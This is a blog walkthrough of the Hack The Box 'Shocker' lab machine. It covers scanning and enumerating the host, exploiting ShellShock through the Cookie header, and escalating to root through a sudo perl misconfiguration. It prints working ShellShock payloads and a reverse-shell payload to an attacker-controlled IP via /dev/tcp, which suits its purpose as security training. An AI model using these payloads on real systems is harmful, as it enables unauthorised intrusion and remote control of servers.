Friday, June 18, 2021

Shocker | Hack The Box | CTF Walkthrough

Hi Guys!! In this blog, we will cover the HTB CTF challenge machine named "Shocker" which is an easy machine.  Capture the flag (CTF) challenge/games can help you understand many aspects of information security. CTF/HTB challenges are full of learning on new vulnerabilities, RCE, Privilege Escalation, etc.


Contents
1. Scanning
2. Enumeration
3. Exploiting
4. Privilege Escalation



  1. Scanning
The first step would be to scan the ports and services running in the target network. One of the most popular port scanner tool is Nmap which allows us to discover all active ports and services that are running on the target network.

nmap -sC -sV 10.10.10.56

Exhibit 1
  1. Enumeration
Now that we know we have 80 and 2222 ports Open, let's see what is running on 80. There is just a picture.

Exhibit 2


Let us enumerate the webserver using Dirb. 

Dirb/Dirbuster is a tool to brute force any directory based on wordlists.

dirb -h http://10.10.10.56/

Exhibit 3

Note: The request to any directory without a trailing slash is mostly handled by sending a redirect request to the same path with a trailing slash. Some of the tools like `dirb` and `dirsearch` take the wordlist and check each entry sending two requests, one with a trailing slash and the other without a trailing slash. And `gobuster` and `feroxbuster` have -f flag to force add the trailing slash at the end of directories.

We have got 403 Forbidden when accessing the cgi-bin directory as shown in Exhibit 4.

Exhibit 4

Let’s use the tool again with dirb -x with the possible extensions .php, .sh and .html.

dirb http://10.10.10.56/cgi-bin /usr/share/wordlists/dirb/common.txt -X extension

Exhibit 5

As shown in Exhibit 5, we found a user.sh file. Let's check the response we are getting when browsing user.sh file.

Note: As we can see in Exhibit 6, there is 2 Content-Type header with value text/x-sh and text/plain. It looks like the script was trying to add a text/plain header, but it is added after the empty line, thus being part of the body and not the header that's why when browsing this file in a browser, the file was getting downloaded.

The output of the "uptime" command in Linux shows a similar kind of response, suggesting this is a CGI bash script running on Shocker. Cgi-bin is mostly vulnerable to ShellShock.

Exhibit 6

ShellShock is a bash vulnerability that was discovered in 2014 which has to do with Bash's "function export" feature. It allows an attacker to execute commands that should be unavailable to them. An initial POC was this:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

This had a huge impact as a lot of different programs takes user input and use it to define environment variables, and the famous of which was CGI-based web servers.
  1. Exploiting
Since the name of the machine is Shocker and CGI script was found, it is OK to assume this is related to ShellShock.

Let's check if Shellshock vulnerability exists using Nmap script -

nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh 10.10.10.56

Exhibit 7

Nmap Script shows that it is vulnerable to ShellShock vulnerability. 

Let's tamper with the Cookie string by adding the following value and see the response -

Cookie: () { :; }; echo ; /bin/ls

Exhibit 8

The server responded with the user.sh value.

Cookie: () { :; }; echo; /usr/bin/id

Exhibit 9

Note: The commands need full paths, as the $PATH variable is empty in the environment in which the ShellShock executes. The payload was successfully executed in Referer, Cookie, and User-Agent.

Let's get a reverse shell by exploiting this vulnerability. We will start a Netcat listener on TCP port 5555 `nc -nvlp 5555`, and then send the following:

Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.37/5555 0>&1

Exhibit 10

Congrats!! We got the reverse shell and user flag as shown in Exhibit 11.

Exhibit 11
  1. Privilege Escalation
When doing a manual basic check "sudo -l", it shows that the user can execute /usr/bin/perl without any password. Let us use this misconfiguration and try to gain root access.

Exhibit 12

We abuse the misconfiguration of sudo by using the exec function to upgrade the shell we are working on -

Exhibit 13

BINGO!! We got the root shell and root flag.

Hope you learned and enjoyed it!!